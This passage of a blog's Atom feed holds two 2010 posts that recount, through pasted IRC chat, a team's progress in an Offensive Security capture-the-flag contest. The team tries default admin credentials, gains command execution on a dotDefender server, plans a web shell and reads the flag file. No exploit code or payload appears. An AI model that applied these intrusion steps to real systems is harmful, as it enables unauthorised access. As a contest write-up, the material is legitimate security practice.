0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; so - dotdefender password ?&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; or just page login ?&lt;br /&gt;&lt;br /&gt;[16:30] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; admin:password&lt;br /&gt;&lt;br /&gt;[16:31] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; haha&lt;br /&gt;&lt;br /&gt;[16:31] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; ok no one has passed phase 1 yet&lt;br /&gt;&lt;br /&gt;[16:31] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; admin/password&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Then a lot of suspens take a look (mr_me though he was one of apollo staff having issue in space and calling nasa):&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[16:32] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; we are having issues here&lt;br /&gt;&lt;br /&gt;[16:32] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; its very slow access&lt;br /&gt;&lt;br /&gt;[16:32] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; yes&lt;br /&gt;&lt;br /&gt;[16:32] &lt;@chap0&gt; si i agree forever and a day to get in&lt;br /&gt;&lt;br /&gt;[16:32] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; Lincoln, http://www2.noob-filter.com/dotdefender/index.cgi&lt;br /&gt;&lt;br /&gt;[16:32] &lt;span style="color: rgb(102, 102, 0);"&gt;&lt;@Lincoln&gt;&lt;/span&gt; ah k&lt;br /&gt;&lt;br /&gt;[16:33] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; yes&lt;br /&gt;&lt;br /&gt;[16:33] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; very slow&lt;br /&gt;&lt;br /&gt;[16:33] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; i built the header&lt;br /&gt;&lt;br /&gt;[16:33] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; and executing the command&lt;br /&gt;&lt;br /&gt;[16:33] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; using the exploit&lt;br /&gt;&lt;br /&gt;[16:33] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; but problem&lt;br /&gt;&lt;br /&gt;[16:33] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; very slow&lt;br /&gt;&lt;br /&gt;[16:33] &lt;@chap0&gt; my page is still loading&lt;br /&gt;&lt;br /&gt;[16:33] &lt;@chap0&gt; :/&lt;br /&gt;&lt;br /&gt;[16:33] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; me 2&lt;br /&gt;&lt;br /&gt;[16:33] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; what the&lt;br /&gt;&lt;br /&gt;[16:34] &lt;@chap0&gt; waht happen?&lt;br /&gt;&lt;br /&gt;[16:34] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; someone DoS'ed it ?&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;The next minutes some of us are becomin a little bit paranos about user agent&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[16:39] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; i have the evil RCE request&lt;br /&gt;&lt;br /&gt;[16:40] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; but its way to slow&lt;br /&gt;&lt;br /&gt;[16:40] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; the server&lt;br /&gt;&lt;br /&gt;[16:40] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; this is a joke&lt;br /&gt;&lt;br /&gt;[16:40] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; yeah didn't scale very well&lt;br /&gt;&lt;br /&gt;[16:41] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; waiting result of my ls-als&lt;br /&gt;&lt;br /&gt;[16:42] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; ok it looks like its ment to be slow&lt;br /&gt;&lt;br /&gt;[16:42] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; thats the hint i get from muts&lt;br /&gt;&lt;br /&gt;[16:42] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; try just catting the file&lt;br /&gt;&lt;br /&gt;[16:42] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; from root&lt;br /&gt;&lt;br /&gt;[16:42] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; or from current folder&lt;br /&gt;&lt;br /&gt;[16:42] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; may be faster&lt;br /&gt;&lt;br /&gt;[16:43] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; yes&lt;br /&gt;&lt;br /&gt;[16:44] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; just waiting the page to be loaded&lt;br /&gt;&lt;br /&gt;[16:44] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; mr_me ---&gt; ment to be slow ?.??????????????&lt;br /&gt;&lt;br /&gt;[16:44] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; well&lt;br /&gt;&lt;br /&gt;[16:45] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; i think maybe we change the user agent&lt;br /&gt;&lt;br /&gt;[16:46] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; yeah I'll try&lt;br /&gt;&lt;br /&gt;[16:46] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; I'll change it to Corelan Team&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;finally one of us got access to the dotdefender admin page and guess who ? (TecR0c)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[16:47] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; haha&lt;br /&gt;&lt;br /&gt;[16:47] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; im in site management&lt;br /&gt;&lt;br /&gt;[16:47] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; w00t&lt;br /&gt;&lt;br /&gt;[16:47] &lt;@chap0&gt; good at least one of us is&lt;br /&gt;&lt;br /&gt;[16:47] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; doesnt load past that&lt;br /&gt;&lt;br /&gt;[16:47] &lt;@chap0&gt; :D&lt;br /&gt;&lt;br /&gt;[16:47] &lt;@chap0&gt; bla&lt;br /&gt;&lt;br /&gt;[16:48] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; na still loading&lt;br /&gt;&lt;br /&gt;[16:48] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; god damn&lt;br /&gt;&lt;br /&gt;[16:49] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; sudo&lt;br /&gt;&lt;br /&gt;[16:49] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; Sud0&lt;br /&gt;&lt;br /&gt;[16:50] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; did it load for u?&lt;br /&gt;&lt;br /&gt;[16:50] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; whats the response headers&lt;br /&gt;&lt;br /&gt;[16:50] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; paste em here&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Then we finally could execute the first command on the server (id)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[16:50] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; ok&lt;br /&gt;&lt;br /&gt;[16:50] *Lincoln* hey&lt;br /&gt;&lt;br /&gt;[16:52] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; uid=48(apache) gid=494(apache) groups=494(apache)&lt;br /&gt;&lt;br /&gt;[16:52] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; /usr/local/APPCure-full/lib/admin&lt;br /&gt;&lt;br /&gt;[16:52] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; uid=48(apache) gid=494(apache) groups=494(apache)&lt;br /&gt;&lt;br /&gt;[16:52] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; /usr/local/APPCure-full/lib/admin&lt;br /&gt;&lt;br /&gt;[16:52] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; uid=48(apache) gid=494(apache) groups=494(apache)&lt;br /&gt;&lt;br /&gt;[16:52] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; /usr/local/APPCure-full/lib/admin&lt;br /&gt;&lt;br /&gt;[16:52] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; uid=48(apache) gid=494(apache) groups=494(apache)&lt;br /&gt;&lt;br /&gt;[16:52] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; /usr/local/APPCure-full/lib/admin&lt;br /&gt;&lt;br /&gt;[16:52] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; NICE&lt;br /&gt;&lt;br /&gt;[16:52] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; dude&lt;br /&gt;&lt;br /&gt;[16:52] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; UPLOAD A WEB SHELL&lt;br /&gt;&lt;br /&gt;[16:53] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; yes will do it ;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;After trying to upload a web shell without success we decided to try an other approach (going directly to the n00bsecret.txt)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[17:32] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; mr_me wake up :)&lt;br /&gt;&lt;br /&gt;[17:32] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; 1 sec&lt;br /&gt;&lt;br /&gt;[17:32] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; héhé&lt;br /&gt;&lt;br /&gt;[17:32] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; can anyone run a find command on the server, to find out where the n00bSecret.txt file is located ?&lt;br /&gt;&lt;br /&gt;[17:32] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; not fast as u&lt;br /&gt;&lt;br /&gt;[17:33] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; they reverted&lt;br /&gt;&lt;br /&gt;[17:33] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; fine :)&lt;br /&gt;&lt;br /&gt;[17:33] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; will find it&lt;br /&gt;&lt;br /&gt;[17:33] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; one sec&lt;br /&gt;&lt;br /&gt;[17:34] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt&lt;br /&gt;&lt;br /&gt;[17:34] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; how did u get that&lt;br /&gt;&lt;br /&gt;[17:34] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; with find command ?&lt;br /&gt;&lt;br /&gt;[17:34] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; so can you cat the file ?&lt;br /&gt;&lt;br /&gt;[17:34] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; cat -&gt;&lt;br /&gt;&lt;br /&gt;[17:34] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; 4e4a430da8f32cfa4e41a3e7999bee6b11e8f925154d4adedd0749790d0644aaebff21dc18451ad0e2d3d06b639315b41478c23663f743bf8e66fa2661a3f21c&lt;br /&gt;&lt;br /&gt;[17:34] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; yeh now cat&lt;br /&gt;&lt;br /&gt;[17:34] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; :D&lt;br /&gt;&lt;br /&gt;[17:34] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; NICE&lt;br /&gt;&lt;br /&gt;[17:34] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; that's the cat ?&lt;br /&gt;&lt;br /&gt;[17:34] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; yayyyyyyyyyyy&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;As the keys life was about 10 mn, First one to gain stage 2 was Mr TecR0c &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[17:38] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; 25 points !&lt;br /&gt;&lt;br /&gt;[17:39] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; stage 2 !&lt;br /&gt;&lt;br /&gt;[17:39] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; guys&lt;br /&gt;&lt;br /&gt;[17:39] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; can you please post your findings on dradis&lt;br /&gt;&lt;br /&gt;[17:39] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; wait&lt;br /&gt;&lt;br /&gt;[17:39] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; wait&lt;br /&gt;&lt;br /&gt;[17:39] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; the file n00b&lt;br /&gt;&lt;br /&gt;[17:39] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; is no longer there&lt;br /&gt;&lt;br /&gt;[17:40] &lt;span style="color: rgb(51, 204, 0);"&gt;&lt;@corelanc0d3r&gt;&lt;/span&gt; file changes every few minutes ?&lt;br /&gt;&lt;br /&gt;[17:40] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; it must&lt;br /&gt;&lt;br /&gt;[17:40] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; shit&lt;br /&gt;&lt;br /&gt;[17:40] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; doesnt work for me&lt;br /&gt;&lt;br /&gt;[17:40] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; Sud0:&lt;br /&gt;&lt;br /&gt;[17:40] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; can u cat it for everyone&lt;br /&gt;&lt;br /&gt;[17:40] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; plz&lt;br /&gt;&lt;br /&gt;[17:40] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; we have slow requests here&lt;br /&gt;&lt;br /&gt;[17:41] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; shti didn't know it can only be used once&lt;br /&gt;&lt;br /&gt;[17:41] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; sorry sud0&lt;br /&gt;&lt;br /&gt;[17:41] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; :'(&lt;br /&gt;&lt;br /&gt;Next Chapter : guetting the killthen00b machine&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3514334976077913459-4143808092353762339?l=sud0-says.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sud0-says.blogspot.com/feeds/4143808092353762339/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://sud0-says.blogspot.com/2010/05/chapter-01-08-05-2010-vs-n00bfilter.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3514334976077913459/posts/default/4143808092353762339'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3514334976077913459/posts/default/4143808092353762339'/><link rel='alternate' type='text/html' href='http://sud0-says.blogspot.com/2010/05/chapter-01-08-05-2010-vs-n00bfilter.html' title='CHAPTER 01 : 08-05-2010 --&gt; VS n00bFilter'/><author><name>Sud0</name><uri>http://www.blogger.com/profile/09090618316098223592</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3514334976077913459.post-3354165678324025637</id><published>2010-05-11T06:43:00.000-07:00</published><updated>2010-05-11T07:31:43.895-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Offsec CTF Intro'/><title type='text'>Offsec CTF : How Strong Is Your Fu (HSIYF)</title><content type='html'>Here we are, my first article on my first blog.&lt;br /&gt;The article is not really about how we got 75 in offsec CTF but how it was, and to share the moment that we spent together&lt;br /&gt;&lt;br /&gt;Generally it started like this (08/05/2010):&lt;br /&gt;&lt;br /&gt;[15:51] &lt;@markot&gt; :D&lt;br /&gt;[15:52] &lt;span style="color: rgb(255, 102, 0);"&gt;&lt;@chap0&gt;&lt;/span&gt; ?howstrongisyourfu?&lt;br /&gt;[15:52] &lt;span style="color: rgb(255, 102, 0);"&gt;&lt;@chap0&gt;&lt;/span&gt; as password????&lt;br /&gt;[15:52] &lt;span style="color: rgb(255, 102, 0);"&gt;&lt;@chap0&gt;&lt;/span&gt; no one got an email???&lt;br /&gt;[15:52] &lt;@markot&gt; i tried "password"&lt;br /&gt;[15:52] &lt;@markot&gt; :D&lt;br /&gt;[15:53] &lt;span style="color: rgb(255, 102, 0);"&gt;&lt;@chap0&gt;&lt;/span&gt; no really ?howstrongisyourfu? is the password that was sent to me&lt;br /&gt;[15:53] &lt;span style="color: rgb(51, 204, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; ok&lt;br /&gt;[15:53] &lt;span style="color: rgb(51, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; back&lt;br /&gt;[15:55] &lt;@markot&gt; works!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;It Ended like That (10/05/2010):&lt;br /&gt;&lt;br /&gt;[11:21] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; uid=0(root) gid=0(root) groups=33(www-data)&lt;br /&gt;[11:21] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; uid=0(root) gid=0(root) groups=33(www-data)&lt;br /&gt;[11:21] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; uid=0(root) gid=0(root) groups=33(www-data)&lt;br /&gt;[11:22] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; uid=0(root) gid=0(root) groups=33(www-data)&lt;br /&gt;[11:22] &lt;span style="color: rgb(204, 51, 204);"&gt;&lt;@_sinn3r&gt;&lt;/span&gt; whoat&lt;br /&gt;[11:22] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; omg&lt;br /&gt;[11:22] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; uid=0(root) gid=0(root) groups=33(www-data)&lt;br /&gt;[11:22] &lt;span style="color: rgb(204, 102, 204);"&gt;&lt;@_sinn3r&gt;&lt;/span&gt; which file?&lt;br /&gt;[11:22] &lt;span style="color: rgb(255, 0, 0);"&gt;&lt;@Sud0&gt;&lt;/span&gt; uid=0(root) gid=0(root) groups=33(www-data)&lt;br /&gt;[11:22] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; give me KEY:)&lt;br /&gt;[11:22] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; wow&lt;br /&gt;[11:22] &lt;span style="color: rgb(102, 255, 255);"&gt;&lt;@TecR0c&gt;&lt;/span&gt; go Sud0  !!!!!!!!!!!!!!&lt;br /&gt;[11:22] &lt;span style="color: rgb(255, 255, 0);"&gt;&lt;@mr_me&gt;&lt;/span&gt; wtf go go&lt;br /&gt;&lt;br /&gt;Ok lets share the best moments between thoes two parts and as you will see all did a great job, everyone got his part.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3514334976077913459-3354165678324025637?l=sud0-says.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sud0-says.blogspot.com/feeds/3354165678324025637/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://sud0-says.blogspot.com/2010/05/offsec-ctf-how-strong-is-your-fu-hsiyf.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3514334976077913459/posts/default/3354165678324025637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3514334976077913459/posts/default/3354165678324025637'/><link rel='alternate' type='text/html' href='http://sud0-says.blogspot.com/2010/05/offsec-ctf-how-strong-is-your-fu-hsiyf.html' title='Offsec CTF : How Strong Is Your Fu (HSIYF)'/><author><name>Sud0</name><uri>http://www.blogger.com/profile/09090618316098223592</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
